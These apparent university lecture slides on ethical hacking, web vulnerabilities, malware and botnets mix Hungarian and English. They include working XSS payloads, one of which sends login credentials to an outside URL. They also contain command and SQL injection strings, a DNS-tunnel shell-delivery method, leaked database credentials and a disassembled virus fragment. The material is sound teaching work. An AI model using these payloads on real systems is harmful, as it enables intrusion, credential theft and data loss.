(c) Boldizsár Bencsáth (bencsath@crysys.hu) Rosszindulatú programok, botnetek Webes sérülékenységek Etikus hacking módszerek
How a typical hacker compromises a system Teljes integritás Információgyűjtés Információ a rendszerről kijutott Már próbálkoztak Már próbálkoztak (b) Egyik próba sikeres Adminisztrátori jogok és infó kijutás Hiba kiaknázáspróba Információk a rendszer belsejéről További célpontok és infogyűjtés Rendszer veszélyben Hiba kiaknázáspróba Információszerzés a gép belső rendszeréről Many attacks are successful by multiple steps! Hiba által shellhez jutás Támadó bejutott Egész rendszer feltörése Minden feltörve Pseudo-random number generators (PRNG) 2
The named version of BME DNS server boldi@hbgyak:~$ dig version.bind @ns.bme.hu txt ch ; <<>> DiG 9.5.1-P3 <<>> version.bind @ns.bme.hu txt ch ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18923 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;version.bind. CH TXT ;; ANSWER SECTION: version.bind. 0 CH TXT "9.5.1-P3" ;; AUTHORITY SECTION: version.bind. 0 CH NS version.bind. Pseudo-random number generators (PRNG) 3
Version.bind So You can check the version of bind But You cannot be sure it is not faked As sysadmin, You might want to set this to something fake That will be security-through-obscurity But If You are lazy to upgrade whenever it is needed- at least, fake the version info Pseudo-random number generators (PRNG) 4
Zone transfer if allowed boldi@hbgyak:~$ dig crysys.hu @ns2.crysys.dc.hu in axfr ; <<>> DiG 9.5.1-P3 <<>> crysys.hu @ns2.crysys.dc.hu in axfr ;; global options: printcmd crysys.hu. 3000 IN SOA ns1.crysys.dc.hu. netadmin.ns1.crysys.dc.hu. 2003030439 43200 14400 2592000 3000 crysys.hu. 3000 IN NS ns1.crysys.dc.hu. crysys.hu. 3000 IN NS ns2.crysys.dc.hu. crysys.hu. 3000 IN A 152.66.249.135 crysys.hu. 3000 IN MX 10 shamir.crysys.hu. crysys.hu. 3000 IN MX 50 eternal.datacontact.hu. crysys.hu. 3000 IN TXT "Datacontact - your nameserver..." aggregator.crysys.hu. 3000 IN A 195.228.45.178 albifrons.crysys.hu. 3000 IN A 10.105.1.95 clamav.crysys.hu. 3000 IN A 152.66.249.132 cypio.crysys.hu. 3000 IN A 152.66.249.135 db.crysys.hu. 3000 IN A 152.66.249.139 deserecprj.crysys.hu. 3000 IN A 152.66.249.132 deserecvclt1.crysys.hu. 3000 IN A 152.66.249.131 deserecvclt2.crysys.hu. 3000 IN A 152.66.249.133 deserecvhost1.crysys.hu. 3000 IN A 152.66.249.130 deserecvirtclt1.crysys.hu. 3000 IN A 152.66.249.131 deserecvirtclt2.crysys.hu. 3000 IN A 152.66.249.133. Pseudo-random number generators (PRNG) 5
Zone transfer authorization boldi@fw:~$ dig crysys.hu @ns1.crysys.dc.hu in axfr ; <<>> DiG 9.5.1-P1 <<>> crysys.hu @ns1.crysys.dc.hu in axfr ;; global options: printcmd ; Transfer failed. Limiting zone transfer in named.conf: allow-transfer { 195.228.45.175; 152.66.249.135; ) Pseudo-random number generators (PRNG) 6
News 2010 valasztas.hu- info leak bad access rights http://valtor.valasztas.hu/valtort/jsp/ http://valtor.valasztas.hu/valtort/jsp/vlt_init_jsp_inc.txt http://valtor.valasztas.hu/valtort/jsp/vlt_start_jsp_inc.txt http://valtor.valasztas.hu/valtort/jsp/vlt_end_jsp_inc.txt Idézet: PoolSet.add("VALTORT",new Pool(new OraclePoolFactory("jdbc:oracle:thin:@172.31.100.104:1521: EKPD","valtort","valtort"),1,1,0,0,0,0,false,false)); van am szekuriti! http://209.85.135.132/search?q=cache:k0qfkgagn1ij:valtor. valasztas.hu/valtort/jsp/vlt_start_jsp_inc.txt+%22jdbc:oracle:t hin:%40172.31.100.104:1521:ekpd%22,%22valtort%22,%2 2valtort%22%29,&cd=3&hl=hu&ct=clnk&gl=hu&client=firefox -a Pseudo-random number generators (PRNG) 7
Google stored version leak after deletion <%! String hstr(int i){return StatData.hstr(i);}%> <%! String dstr(java.sql.date d){return StatData.dstr(d);}%> <%! String ifa(boolean l, String qstr, String[] param, int n) { return StatData.ifA(l, qstr, param, n);}%> <%! String ifa(boolean l, String qstr, String[] param, String link) { return StatData.ifA(l, qstr, param, link);}%> <%! String ifa(string qstr, String[] param, int n) { return StatData.ifA(qstr, param, n);}%> <% PoolSetObj pso = null; Connection c = null; PreparedStatement st[] = new PreparedStatement[0]; try { Class l_c = this.getclass(); java.lang.reflect.field f = l_c.getdeclaredfield("sqln"); int l_n = f.getint(l_c); st = new PreparedStatement[l_n]; }catch (Exception e) {} PreparedStatement pst = null; ResultSet rs = null; String sql = null; try { if (PoolSet.get("VALTORT")==null) PoolSet.add("VALTORT",new Pool(new OraclePoolFactory("jdbc:oracle:thin:@172.31.100.104:1521:EKPD","valt ort","valtort"),1,1,0,0,0,0,false,false)); pso = PoolSet.getSetObj("VALTORT",funcName); c = (Connection)pso.getObj(); StatData.loadData(c); %> <html> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-2"> Pseudo-random number generators (PRNG) 8
Example Web info leak video here End of part talking about info gathering /leak Security by obscurity -> is it good? Pseudo-random number generators (PRNG) 9
VULNS Main web vulns will be covered here XSS Code injection SQL injection Pseudo-random number generators (PRNG) 10
Case study: Hacker attack against valasztas.hu 2010 Pseudo-random number generators (PRNG) 11
Offending links / XSS http://www.valasztas.hu/pv10vt/j24p.jsp?jlcs=3&nev=mas zop+maffi%f3z%f3i http://www.valasztas.hu/pv10vt/j24p.jsp?jlcs=22&nev=zsi desz+- +Magyar+Politikusb%FBn%F6z%F5+Sz%F6vets%E9g+ http://www.valasztas.hu/pv10vt/j24p.jsp?jlcs=20&nev=az %20egyetlen%20tiszta%20p%E1rt,%20a%20Jobbik The parameter NEV is not used carefully on the server Possibility of Cross-site-scripting Pseudo-random number generators (PRNG) 12
What is XSS (cross site scripting)? Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007.[1] Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner. Pseudo-random number generators (PRNG) 13
XSS Exploit scenarios Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security. Non-persistent: Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information. Mallory observes that Bob's website contains a reflected XSS vulnerability. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect. Alice visits the URL provided by Mallory while logged into Bob's website. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge. Persistent attack: Mallory posts a message with malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob.[16] [not too much difference between the two] Pseudo-random number generators (PRNG) 14
root@hbgyak:/data/html# more xss.php Hello <? echo "$nev";?> (register_globals=on) Pseudo-random number generators (PRNG) 15
Xss.php?nev=boldi Pseudo-random number generators (PRNG) 16
http://10.105.1.54/xss.php?nev=%3cscript%20%0d%0a% 3Ealert%281111%29;%3C/ScRiPt%3E Pseudo-random number generators (PRNG) 17
Pseudo-random number generators (PRNG) 18
XSS vulnerability found by Acunetix scanner Pseudo-random number generators (PRNG) 19
Ha az egeret a user részre visszük, Pseudo-random number generators (PRNG) 20
Nexon XSS: Have a look inside <!-- Üres sor (hogy a bejelentkezés képrészletbe ne írjunk bele) --> <tr> <td height="60" colspan="4"> </td> </tr> <!-- Felhasználói név --> <tr> <td width="310"></td> <td class="subtitle" width="85" align="right">felhasználó: </td> <td width="149"> <input type="text" name="vstrusername" id="vstrusername" style="width: 80%" size="20" value="" onmouseover=prompt(938492) bad=""> </td> <td width="30"> </td> </tr> Pseudo-random number generators (PRNG) 21
Neptun XSS found by Acunetix scanner Pseudo-random number generators (PRNG) 22
Details. http://neptun.bme.huzz/?res=aa%22 -> <form name="login" method="post" action="include/setcookie.php?res=aa""> http://10.105.1.48/neptun/?res=%22%20onsubmit=%22%20i m=new%20image;%20im.src=%27http://www.crysys.hu/nept un/%27%2bdocument.forms[0].uname.value%2b%27:%27% 2bdocument.forms[0].passwd.value Results in: method="post" action="include/setcookie.php?res=" onsubmit=" im=new Image; im.src='http://www.crysys.hu/neptun/'+document.forms[0].un ame.value+':'+document.forms[0].passwd.value"> Pseudo-random number generators (PRNG) 23
Pseudo-random number generators (PRNG) 24
Pseudo-random number generators (PRNG) 25
Code injection example Consider the following PHP code: <? $o=`ls la $i`; echo("result of the command:$o"); http://www.crysys.hu/code.php?i=aa result of the command:-rw-rw-r-- 1 boldi boldi 0 Feb 24 21:40 aa http://www.crysys.hu/code.php?i=aa;cat%20/etc/passwd grep%20root result of the command:-rw-rw-r-- 1 boldi boldi 0 Feb 24 21:40 aa root:x:0:0:root:/root:/bin/bash The variable $i is controlled by the client The PHP script will run a shell command containing the $i string The client can get out of the ls command by simple tricks in this case ; will help him to put another command to the shell specified totally by the attacker Pseudo-random number generators (PRNG) 26
Php fopen error video shown here Pseudo-random number generators (PRNG) 27
SQL injection example Consider the following statement: statement = "SELECT * FROM `users` WHERE `name` = '" + username + "';" Set username to: ' or '1'='1 This results in: SELECT * FROM `users` WHERE `name` = '' OR '1'='1'; (will list all users) Or a more problematic attacking string: a';drop TABLE `users`; SELECT * FROM `userinfo` WHERE 't' = 't Results in: SELECT * FROM `users` WHERE `name` = 'a'; DROP TABLE `users`; SELECT * FROM `userinfo` WHERE 't' = 't'; Some tricks: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ Pseudo-random number generators (PRNG) 28
SQL injection very very very short summary There are sql commands to save/load files and sometimes to start processes It s very important not to let users to do arbitrary SQL commands Sqlmap videos shown here Pseudo-random number generators (PRNG) 29
Cross-site scripting example PHP example: <?echo "hello $user";?> http://www.crysys.hu/code2.php?user=boldi hello boldi http://www.crysys.hu/code2.php?user=%3cscript%3ealert%281%29%3c/s cript%3e (that means: http://www.crysys.hu/code2.php?user=<script>alert(1)</script> ) Will result in an alert box. Any javascript code be embedded in this way (specified by the attacker). The code can be specified by the creator of the URL, the bad code is on the attacked server (crysys.hu php code) The script will be executed on the client, with the environment of the server host (e.g. here crysys.hu) thus the script can get e.g. cookie information from the crysys.hu domain. (The javascript interpreter on the client computer will believe that the javascript code is specified by crysys.hu, not the URL creator!) Pseudo-random number generators (PRNG) 30
PHP in DNS: Ethical hacker conf material Van egy sérülékeny weboldalunk Tudunk parancsokat futtatni, de szeretnénk shellt A parancsfuttatás méretkorlátos: csak ~26 karakter hosszú max. Webes alkönyvtárakat nem tudjuk írni A sérülékeny gépről kifele semmilyen port nem nyitható A sérülékeny gép kívülről csak a 80-as porton érhető el A DNS viszont jól láthatóan működik Pseudo-random number generators (PRNG) 31
A sérülékeny script bizonyítványnézegető (ez fonto $ more read.php Reading cert file <? $certname=$_request["certname"]; $certname=substr($certname,0,26); sleep(2); #Against brute force User controlled string Shell command like exec, system, etc. $res=`cat certs/$certname`; if (preg_match("/ok/",$res)) { echo("cert loaded successfully: ".$res."\n<br>");} else { echo("bad certname (debug:<pre> file:$certname res:$res </pre>) "); } Pseudo-random number generators (PRNG) 32
Nagyon meg van kötve a kezünk Nem rakhatunk fel reverse php shellt, mert nem tudunk írni a web könyvtárakba Reverse shell nem tud kapcsolatot nyitni kifele Még egy wget, tftp sem fut le, nem lehet feltölteni fájlokat Nincs root jogunk sem, nem lőhetjük le a web szervert Mit tegyünk? Pseudo-random number generators (PRNG) 33
Több problémát kell megoldani Milyen átviteli közeget tudunk használni a kommunikációra egy shellel? Milyen módon juttassuk el a shellt biztosító kódunkat és mi legyen az? Pseudo-random number generators (PRNG) 34
DNS Tunnel A shell átviteli közege nem lehet webes, hisz nem csinálhatunk új tartalmat Minden más port zárva Csak a DNS jön szóba átviteli közegnek A válasz adott: DNS Tunnel IP csomag DNS kérés IP csomag Helyi DNS DNS server Feltöltött DNS tunnel alkalmazás IP csomag DNS tunnel végpont Támadó üzemelteti Pseudo-random number generators (PRNG) 35
Mivel? Sok lehetőség van, de akadnak gondok is Iodined: tun if root jog kell mindkét oldalon Heyoka OzymanDNS Squeeza NSTX: tun virtuális interfész: root jog kell Dns2tcp Pseudo-random number generators (PRNG) 36
DNS2TCP http://www.hsc.fr/ressources/outils/dns2tcp/index.html.en http://www.hsc.fr/ressources/outils/dns2tcp/download/dns2tcp- 0.5.2.tar.gz A DNS2TCP-t válaszottuk C implementáció, kis méret, portabilitás (könnyű felrakni) Nincs szükség root jogra a kliensen Csak fel kell töltenünk a kb. 30 kilobyte méretű programot és elindítani -rwxr-xr-x 1 root root -rwxr-xr-x 1 root root 38832 Apr 18 08:06 dns2tcpc 39844 Apr 18 08:06 dns2tcpd Pseudo-random number generators (PRNG) 37
Hogy töltsük föl a DNS tunnel alkalmazást? Töltsük fel byte-onként! Így elfér 24 karakterben egy-egy parancs Pl.: login=;printf \\001 >>/tmp/a Ezesetben egy-egy tetszőleges bináris byte-ot tudunk fájlba irányítani Nagyon sok kérés kell egy fájlfeltöltéshez A script pár másodperces késleltetést is tartalmaz, így napokig töltögethetnénk Ez így nem fog menni Pseudo-random number generators (PRNG) 38
Használjuk a DNS-t! Már a kód feltöltéshez is a DNS-t kell használnunk Helyezzünk PHP kódot DNS adatokba és bízzuk a PHP értelmezőre! Önkicsomagoló PHP kód: kód és adat egyhelyen Egy parancs kell csak szinte a feltöltéshez dig prj.hu in txt php (kipróbálható!) Természetesen van más megoldás is, pl. adat DNS-ben, kicsomagoló kód külön Pseudo-random number generators (PRNG) 39
Hogy működik Minta lekérdezés: boldi@eternal:~$ dig prj.hu in txt ; <<>> DiG 9.7.3 <<>> prj.hu in txt ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34449 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;prj.hu. IN TXT ;; ANSWER SECTION: prj.hu. 20 IN TXT "v=spf1 a mx -all" Pseudo-random number generators (PRNG) 40
Rakjunk bele php kódot ; <<>> DiG 9.7.3 <<>> prj.hu in txt ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34449 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;prj.hu. IN TXT ;; ANSWER SECTION: prj.hu. 20 IN TXT " <?php echo 'hello world '.(3+3)?>" prj.hu. 20 IN TXT "v=spf1 a mx -all" Nézzük az eredményét! Pseudo-random number generators (PRNG) 41
Eredmény rendben fut ; <<>> DiG 9.7.3 <<>> prj.hu in txt ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45532 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;prj.hu. IN TXT ;; ANSWER SECTION: prj.hu. 20 IN TXT "v=spf1 a mx -all" prj.hu. 20 IN TXT " hello world 6" Pseudo-random number generators (PRNG) 42
Gondok ; és idézőjel nem használható \; kerülne a helyére Szerencsére a tag lezárás egyenértékű egy ;-vel Természetesen lehetne utófeldolgozni is (\ kivétele sed-del) Pl. <?php echo a?><?php echo b?> Idézőjel ( ) sem használható, de aposztróf ( ) igen Hibás: prj.hu. 1 IN TXT " <?php echo " "hello" "world" ".2+2\;?> Egy jó megvalósítás: @ 5 TXT " <?php echo 'hello world '.(3+3)?>" Pseudo-random number generators (PRNG) 43
Továbbá Egy TXT string csak 255 byte lehet Több TXT string is lehet egy bejegyzéshez A teljes rekord nem lehet 64k felett, udp query 4k felett Egyes tűzfalak limitálhatják a méretet Más speciális karakterek sem működnek. Vagy nehézkes megoldani Külön gond: A rekordok round robin kerülnek megjelentetésre (random sorrend) Pseudo-random number generators (PRNG) 44
Round robin válasz random sorrend Tervezett kód: prj.hu. 20 IN TXT " <?php $a=1?>" prj.hu. 20 IN TXT " <?php $a=$a+1?>" prj.hu. 20 IN TXT " <?php echo $a?> Letöltéskor kapott adat: ;; ANSWER SECTION: prj.hu. 20 IN TXT " <?php $a=$a+1?>" prj.hu. 20 IN TXT " <?php echo $a?>" prj.hu. 20 IN TXT " <?php $a=1?>" Nyilvánvalóan a két kód nem vezet azonos eredményre. Pseudo-random number generators (PRNG) 45
Megoldás a sorrendproblémára goto csak PHP 5.3.0 fölött p3 5 TXT " <?php a15:?><?php if ($t!=1) {?><?php goto a0?><?php }?><?php goto a16 p3 5 TXT " <?php a52:?><?php if ($t!=1) {?><?php goto a0?><?php }?><?php goto a53 p3 5 TXT " <?php a0:?><?php \$t=1?> <?php goto a1?> A lefutás végén die(); Pseudo-random number generators (PRNG) 46
Megoldások A különleges karaktereket tartalmazó kódot base64 kódolhatjuk, kicsomagolás után eval segítségével futtathatjuk Nagyobb stringeket szétvághatunk és darabokban kódoljuk egy-egy TXT rekordra, majd konkatenálunk TTL-t alacsonyan tartjuk, hogy frissíthessünk ha rossz a kód Pseudo-random number generators (PRNG) 47
Kezdjük összerakni Dns2tcp DNS tunnel lefordítva Packer.php: Becsomagoljuk a DNS tunnel klienst és hosszabb parancsainkat DNS rekordokba (előkészítés) DNS kiszolgáló: Az eredményt be kell tölteni a DNS-be Futtatás: Egyetlen paranccsal aktiváljuk az eredményt a sérülékeny gépen Elvárt eredmény: shell hozzáférés Pseudo-random number generators (PRNG) 48
1. Use tools 2. Use your mind Pseudo-random number generators (PRNG) 49
1. Use tools Use tools as they are more up to date, than you Example: Qualys Browsercheck is a great tool to test your browser s plugins Pseudo-random number generators (PRNG) 50
Pseudo-random number generators (PRNG) 51
Pseudo-random number generators (PRNG) 52
Network vulnerability scanners Target: A system, IP range, etc. Goal: To find vulnerable software components of the target in a fast and efficient way: Test against ten thousands of vulnerabilities in seconds Working method: Scans target for services identifies software version Performs basic tests to find out vulnerable services (e.g. is anonymous ftp login enabled?) Generally uses a number of active plugins to test target service against known vulnerabilities Uses a database that contains vulnerable software version numbers -> only matching this to the identified software version might result in large number of false positives Generally a lot more is incorporated (login support, password trial for weak pw., fuzzing tests, etc.) Pseudo-random number generators (PRNG) 53
Problems and advantages of vulnerability scanners Problems Limited availability of free tools (Nessus: free, open source to closed source, limited free version) Vulnerability databases have to be kept updated Knowledge might be needed on the OS, Services to have accurate results (to avoid false positives) Attacks against custom settings, tools, software components is generally missing Generally, no new attack or system-wide vulnerability can be found The human knowledge is still needed Advantages Automatic running, fast scanning of multiple hosts against thousands of vulnerabilities Good looking automatic reports as audit material Most of the internet-wide scanning attacks can be prevented (those attackers also use standard attacks, databases) Pseudo-random number generators (PRNG) 54
Web vulnerability scanner Acunetix Web Vulnerability scanner is a great tool to find web attacks Even unknown ones (SQL injection, cross site scripting) The trial version only checks for XSS attacks 1. Acunetix XSS scanner VIDEO acunetix-webscan-1-v1.avi 04:20 Homework: Install and test -Nessus -Eagle Eye Retina Community Ed. -Nmap 2. NESSUS Pseudo-random number generators (PRNG) 55
M MALWARE Pseudo-random number generators (PRNG) 56
Malware malicious and software software designed to infiltrate or damage a computer system without the owner's informed consent Computer virus Worm Trojan horse Rootkit, backdoor Spyware Keylogger Adware Zombie,bot Fake antivirus product etc. Pseudo-random number generators (PRNG) 57
Computer Virus why the name? A virus is: Not a full program, cannot live alone It reproduces itself, spreads. ( Infection ) Some transfer media, user interaction might be needed Makes nasty things (or not) Most so-called viruses is not a virus by this definition. Worm: Can reproduce automatically (no user needed) Trojan Horse: The user thinks that the code is o.k., but it isn t. Rootkit, backdoor: remains on the computer and hard to find Bot: participates in a distributed network for malicious activity. Pseudo-random number generators (PRNG) 58
Virus classification boot sector file infector macro virus encrypted virus stealth virus polymorphic virus (modifications to avoid identification: encryption, inserting dummy code) metamorphic virus (the same, but not inserting dummy code, instead, a-code-that-does-the-same) Pseudo-random number generators (PRNG) 59
Old-school file virus Modifies executable files, appends own code into them (how? -.com:simple.exe:a bit more difficult) Whenever the executable is loaded, the virus is started Might instantly check for one/more/all other executables (only.com/only.exe/all) and infect them Or just load into the memory, stay resident (TSR), and infect whenever we execute any program Might modify or encrypt itself at every infection some decryption part is still the same (opportunity to recognize the virus) 20 byte is enough for a basic encryption scheme Tricky modifications can be done by the virus (e.g. xor ax,ax ; mov ax,0 ; sub ax,ax are the same) Pseudo-random number generators (PRNG) 60
Other viruses ( virii ) Boot virus: infects boot sector (if you leave a floppy in the drive, it loads the code, and then, ) (now: USB autorun malware) Macro virus: Word/Excel macros affected Hardware level destroying virus: E.g. CIH bios clearing, or cd-rom firmware bugs BIOS virus: Part of the code is stored in the BIOS disinfection might be hard (one of the latest tricks, difficult) Encrypting (ransom) malware: Encrypts all the files, decryption only when you pay. Pseudo-random number generators (PRNG) 61
Goals of the virus-writers Old times: just to show it is possible to write such code proof of concept (first virus ~1982) Be famous (or to collect- vxers ) For fun Do harmful activities To write a better virus: harder to identify, harder to disinfect, faster spreading, Earn money ( spam, fake virus scanners, phishing, passoword and credit card no. collection, ransom (by encryption), fake-rogue security software, etc. Pseudo-random number generators (PRNG) 62
Potyogós virus - cascade Back from 1987 the starting time of the new era for viruses 1071 byte First virus that caused mass infection in Hungary Encrypts itself in some form (no, not AES, nor RSA) Nasty code: after some time, characters started to fall off the screen TSR code http://www.youtube.com/watch?v=uwlg6tteqrg Also check: http://kannan.jumbledthoughts.com/index.php/21-virus-and-othermalware-payload-videos/ Pseudo-random number generators (PRNG) 63
Potyogós in action Pseudo-random number generators (PRNG) 64
Binary version of polimer virus only ~1000 bytes Pseudo-random number generators (PRNG) 65
Part of disassembled virus polimer polimer proc far start:: jmp loc_4 db 00h, 3Fh db 7 dup (3Fh) db 43h, 4Fh, 4Dh, 00h, 02h, 00h db 40h, 00h, 8Dh, 36h, 80h, 00h db 03h, 00h db 14 dup (0) data_59 db 'A legjobb kazetta a POLIMER kaze' db 'tta! Vegye ezt! ', 0Ah, 0Dh db '$' db 'ERROR', 0Ah, 0Dh, '$' data_60 dw 5 data_61 dw 147Dh loc_1:: mov si,data_46e mov di,data_49e mov cx,30h cld ; Clear direction rep movsb ; Rep when cx >0 Mov [si] to es:[di] jmp $-0BAh loc_2:: jmp loc_10 loc_3:: jmp loc_9 loc_4:: mov al,0 mov ah,0eh int 21h ; DOS Services ah=function 0Eh ; set default drive dl (0=a:) mov dx,data_36e mov ah,1ah int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx Pseudo-random number generators (PRNG) 66
Sample polymorphic code the basis Start: GOTO Decryption_Code Encrypted:... lots of encrypted code... Decryption_Code: A = Encrypted Loop: B = *A B = B XOR CryptoKey *A = B A = A + 1 GOTO Loop IF NOT A = Decryption_Code GOTO Encrypted CryptoKey: some_random_number From wikipedia Pseudo-random number generators (PRNG) 67
The polymorphic equivalent Start: GOTO Decryption_Code Encrypted:... lots of encrypted code... Decryption_Code: C = C + 1 A = Encrypted Loop: B = *A C = 3214 * A B = B XOR CryptoKey *A = B C = 1 C = A + B A = A + 1 GOTO Loop IF NOT A = Decryption_Code C = C^2 GOTO Encrypted CryptoKey: some_random_number Pseudo-random number generators (PRNG) 68
Macro virus became very common in mid-1990s since platform independent infect documents easily spread exploit macro capability of office apps executable program embedded in office doc often a form of Basic more recent releases include protection recognized by many anti-virus programs Pseudo-random number generators (PRNG) 69
Rogue security software -wiki I guess You expected a shorter list, The number of Rogue security software rose at an insane rate in the last few years Pseudo-random number generators (PRNG) 70
Limits of the malware A malware can fully control a computer Read memory, files Record keyboard, mouse, monitor activity Use webcam, microphone of the computer Find all archived information (emails, stored passwords, email, web history, stored files, etc.) A malware can hide itself very efficiently, currently it is almost always identifiable, but later? Security schemes with additional hardware needed (smart card, token, OTP generator with/without challenge) remember: the computer is still controlled by the attacker No easy solution on untrusted terminal problem Therefore it is essential to avoid malware infections Of course, in practice, malware is not perfect, but: expect the worst case. Pseudo-random number generators (PRNG) 71
Worms replicating program that propagates over net using email, remote exec, remote login has phases like a virus: dormant, propagation, triggering, execution propagation phase: searches for other systems, connects to it, copies self to it and runs may disguise itself as a system process concept seen in Brunner s Shockwave Rider implemented by Xerox Palo Alto labs in 1980 s Pseudo-random number generators (PRNG) 72
Worm propagation model Pseudo-random number generators (PRNG) 73
Famous Worm Attacks Code Red July 2001 exploiting MS IIS bug probes random IP address, does DDoS attack consumes significant net capacity when active Code Red II variant includes backdoor SQL Slammer early 2003, attacks MS SQL Server compact and very rapid spread Mydoom mass-mailing e-mail worm that appeared in 2004 installed remote access backdoor in infected systems Nowtimes: One after the other, hard to keep-up with new worms/botnets Pseudo-random number generators (PRNG) 74
Identification of malware Based on signatures (hard to make for polymorphic or metamorphic code) In files (virus) In network traffic (worms, email viruses) In memory (infected hosts, e.g. botnet) Highly optimized (thousands of signatures should be detected) Based on behavior (anomaly detection, checking code (e.g. for unpacking), heuristic algorithms scoring) Pseudo-random number generators (PRNG) 75
Removal of malware First step: terminate running malware (not possible at every time ) The malware might stop the removal tool The malware might detect our plans and do bad things (e.g. delete files) Some malware run in multiple tasks to avoid stopping Some malware are specially designed to download more malware all should be removed The files of the malware should be identified Based on signatures Check auto-start applications Can be deep in the OS (modified kernel, modified BIOS) For traditional viruses: the code is injected into a binary executable Remove the malware Generally a simple file deletion is enough In traditional virus, the code should be extracted from the host software: hard task, virus killers exist, but not for all virus Backdoors, or re-infection trick made by the malware should also be cleared (not very common) The vulnerability should also be handled to avoid re-infection Some junk might remain including text files with collected passwords!) Most malware has a mechanism to avoid multiple infections might be a trick to protect hosts (e.g. modify exe header / might corrupt some files and others remain unaffected) Pseudo-random number generators (PRNG) 76
Future of malware Stuxnet is a great example for targeted attacks, where the goal of the adversary is to attack a very specific target In this case, the target was some industrial facilities (related to nuclear power) in Iran Advanced persistent threat (APT) usually refers to a group, such as a foreign nation state government, with both the capability and the intent to persistently and effectively target a specific entity. Virtualization, malware analysis, collaborative countermeasures, mobile phones, embedded systems: Lot of open questions in the field of malware Pseudo-random number generators (PRNG) 77
Botnet RoBOT NETwork Gépek megfertőzése Fertőzött gépekből hálózat kialakítása Vezérlésre várakozás Támadás, vezérlésre (DDoS, spam, etc.) Frissítés További fertőzések stb. Legnagyobb botnetek mérete milliós nagyságrendű Pseudo-random number generators (PRNG) 78
Botnet history Pseudo-random number generators (PRNG) 79
DDoS Botnet with IRC Attacker Internet IRC server 1 IRC server n Attacking computers, zombies Target Pseudo-random number generators (PRNG) 80
IRC-Internet Relay Chat censored Pseudo-random number generators (PRNG) 81
IRC botnets IRC botnets: A controller can send messages to a channel The messages are received by the bots on the same channel (the servers relay the messages) The channel might be protected e.g. with password (of course, this can be recovered from active bots or by sniffing network activity: IRC is a cleartext protocol) The messages contain the commands of the controller/owner Bots can test the authenticity of the messages in some fashion Pseudo-random number generators (PRNG) 82
centralized vs. P2P botnet IRC-based and other centralized botnets have drawbacks A new trend for botnets is using P2P technologies DHT (distributed hash tables) based techniques are common However, e.g. delay might be higher for P2P botnets Planning Botnet detection Delay Survivability Identification of the controller/ owner centralized easy (1) easy (1) small (3) bad (1) easy (1) P2P hard (3) hard (3) medium (2) good (3) hard (3) Pseudo-random number generators (PRNG) 83
How to determine the size of the botnet? The size of the botnet is an important parameter. A large botnet can be more dangerous Counting individual IP addresses can give false results (e.g. bots behind NAT) The size of the botnet constantly changes counting can also take time -> error IRC based botnets: activity of the bots might be visible, easy to count P2P botnets: e.g. doing queries in the DHT; sometimes the botnet uses IDs to identify individual bots last ID might be queried Pseudo-random number generators (PRNG) 84
What to do against botnets Identification, size estimation Upgrade, patch against vulnerabilities (sometimes the patch gives hints to the attackers) Patch the vulnerable hosts remotely: illegal Find the owner of the botnet (hard task) Get control over the botnet (better botnets, harder to do) Support removal (by tools, knowledge): slow Eliminate upgrade possibilities (e.g domains, web pages) or control mechanism (disable communication, injecting code): harder and harder Pseudo-random number generators (PRNG) 85
Conficker botnet MS08-067 vulnerability is used A,B and C variants exist (as of 05/2009) Conficker is a DLL Using the vulnerability it inserts itself into the system as a system service Also uses USB drives to infect DLL + rundll32.exe (turn off auto-run for USB drives!) Update: Time-seeded random domain names are used to download encrypted binaries by HTTP. Source: Analysis of honeynet.org Pseudo-random number generators (PRNG) 86
Vulnerability used by Conficker Vulnerability: NetpwPathCanonicalize() in netapi32.dll. On an established SMB channel (port 445), a path string is canonicalized. E.g. aaa\bbb\..\ccc -> aaa\bbb With a specially crafted path string it is possible to move beyond the start of a stack buffer and overwrite return address (not a classical buffer overflow, but similar) PEB shellcode is used, 00 bytes are avoided with an xor encryption routine Pseudo-random number generators (PRNG) 87
Conficker hooks some system calls E.g. DNS: to filter out for antivirus websites Pseudo-random number generators (PRNG) 88
